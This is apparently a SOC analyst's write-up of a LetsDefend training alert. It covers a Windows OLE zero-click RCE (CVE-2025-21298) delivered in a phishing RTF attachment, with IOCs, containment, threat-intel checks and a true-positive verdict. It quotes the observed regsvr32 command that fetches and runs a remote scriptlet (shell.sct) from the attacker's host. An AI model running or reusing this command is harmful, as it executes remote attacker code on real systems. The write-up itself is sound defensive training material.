Alert Name: SOC336 – Windows OLE Zero-Click RCE Exploitation Detected
Severity: Critical
Event ID: 314
Event Time: Feb 04, 2025, 04:18 PM
Category: Malware

Base Information

FieldValue
SeverityCritical
Event ID314
Event TimeFeb 04, 2025, 04:18 PM
Rule NameSOC336 – Windows OLE Zero-Click RCE Exploitation Detected
CVECVE-2025-21298
Analyst LevelSecurity Analyst
Source IP / SMTP Address84.38.130.118
Sender Emailprojectmanagement@pm.me
Recipient EmailAustin@letsdefend.io
Email SubjectImportant: Action Required for Upcoming Project Deadline
Attachment Namemail.rtf
Attachment Hash (SHA-256)df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
Device ActionAllowed
Trigger ReasonMalicious RTF attachment matching CVE-2025-21298 exploit pattern

Basic Context

Windows OLE (Object Linking and Embedding) is a Microsoft technology that allows documents to embed or link objects from other applications. Vulnerabilities in OLE can allow attackers to achieve remote code execution without user interaction, often referred to as zero-click exploits.

Key details recorded before investigation:

Play Book

Initial Containment and Host Review

Endpoint details for the affected system:

  • Hostname: Austin
  • Domain: LetsDefend
  • IP Address: 172.16.17.137
  • OS: Windows 10 (64-bit)
  • Primary User: Austin
  • Role: Server
  • Last Login: Feb 04, 2025, 04:33 PM

The endpoint was immediately placed under containment to prevent further execution or lateral movement during the investigation.

Command Execution Observed

Terminal history revealed the following command execution:

“C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll”

This command is a known living-off-the-land technique abusing regsvr32 to load a remote scriptlet file, enabling code execution without dropping a traditional executable to disk.

Malware Analysis

The attachment hash was analyzed using multiple threat intelligence platforms.

  • VirusTotal: Multiple detections confirming malicious behavior
  • URLHaus: Associated with active malicious infrastructure
  • IBM X-Force Exchange: Classified as malware exploiting Windows OLE

Analysis confirms the RTF document weaponized a Windows OLE vulnerability to trigger remote code execution, leading to the regsvr32-based payload execution.

Email Analysis

Email investigation showed:

  • No additional emails sent by the same sender to other users
  • No evidence of the recipient forwarding the email internally
  • No outbound emails originating from Austin related to this message

This indicates a targeted phishing attempt rather than a broad campaign.

Impact Assessment

  • Attack Type: Zero-click remote code execution
  • Exploitation Success: Yes
  • Initial Access Vector: Malicious RTF email attachment
  • Code Execution: Confirmed via regsvr32 abuse
  • Lateral Movement: Not observed
  • Persistence: Possible, further forensic analysis required

Conclusion

This incident represents a successful exploitation of CVE-2025-21298 using a malicious RTF document leveraging Windows OLE. The attacker achieved remote code execution without requiring user interaction. The affected system was contained promptly, preventing observed lateral spread; however, further environment-wide hunting and forensic analysis are required.

Final Verdict

True Positive – Confirmed Zero-Click RCE Exploitation

The alert accurately detected a critical zero-click Windows OLE remote code execution attack. Immediate containment was successful, but full remediation and threat hunting across the environment are required.

Additional References